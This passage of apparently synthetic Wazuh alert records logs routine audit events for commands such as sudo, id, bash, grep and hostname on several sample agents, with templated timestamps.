/usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: 